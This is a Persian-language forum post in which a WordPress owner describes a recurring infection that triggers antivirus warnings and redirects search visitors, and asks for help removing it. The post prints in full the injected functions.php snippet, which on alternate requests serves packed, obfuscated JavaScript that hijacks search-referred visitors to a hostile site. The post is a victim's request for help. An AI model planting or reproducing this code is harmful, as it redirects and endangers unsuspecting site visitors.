khaalesسلام
چند روزه من دهنم سرویس شده دوستان!
وقتی سایت وردپرس ی م رو باز می کنم avast یا nod32 تشخیص می دن که تروجان داره
انواع و اقسام حالت ها هم در شرایط یکسان پیش میاد!
- بعضی موقع ها صفحه رو باز نمی کنه
- گاهی بدون www نمیاد ولی با اون میاد
- اوایل باعث ریدایرکت شدن صفحه می شد به یه جای دیگه به نام googoserch که این بیشتر وقتی اتفاق می افتاد که سایت م رو در گوگل سرچ می کردم و وارد اون می شدم
- گاهی آنتی ویروس ها ارور رو می دن و هشدار رو اعلام می کنن اما صفحه کامل باز می شه، گاهی اوقات هم جلوی باز شدن صفحه رو می گیرن و نمی ذارن
بعد از کلی ور رفتن با کدهای جاوااسکریپت ی که توی سایت استفاده شده و پاک کردن تک تک اونها مشکل حل می شد ولی بعد دوباره فرداش می دیدم هست. چون رفتارش هم متغیره آدم متوجه نمیشه که مشکل حل شده یا نه
همین الان هم مطمئن نیستم!
دست آخر از تو فروم های خارجی چیزایی دستگیرم شد. گفتم یه تاپیک اینجا بزنم که کسانی که مشکل مشابه دارند یا سررشته دارند کمک کنند.
آخرین و مهم ترین چیزی که دستگیرم شده اینه:
یه کدی هست که آخر فایل function.php پوسته م می شینه. اون کد رو که پاک کردم درست شد. البته امروز صبح که اومدم خودش به آخر فایل دوباره اضافه شده بود!!!! اون کد اینه:
<?php
add_action('get_footer', 'add_sscounter');
function add_sscounter(){
echo '<!--scounter-->';
if(function_exists('is_user_logged_in')){
if(time()%2 == 0 && !is_user_logged_in()){
echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
}
}
}
?>گویا کلیدواژه ی این تروجان همین packer یا packed با خط فاصله های بین ش هست. این کلمه رو یه جای دیگه هم توی دایرکتوری js از فولدر wp-admin داریم. توی بسته ی اصلی وردپرس هم چک کردم بود. نمی دونم چی کار می کنه ولی اونجا هم یه فایل پی اچ پی بین همه ی فایل های js وجود داره که توش یه همچین چیزی شبیه به این هست.
یه جایی توی فروم خارجی یکی پرسیده بود این چیه و چی کار می کنه؟ جک و لطیفه ست؟ یکی هم جواب داده بود آره جوک ه!!!!
خلاصه کمک!!!!!!!!!
حلنشده
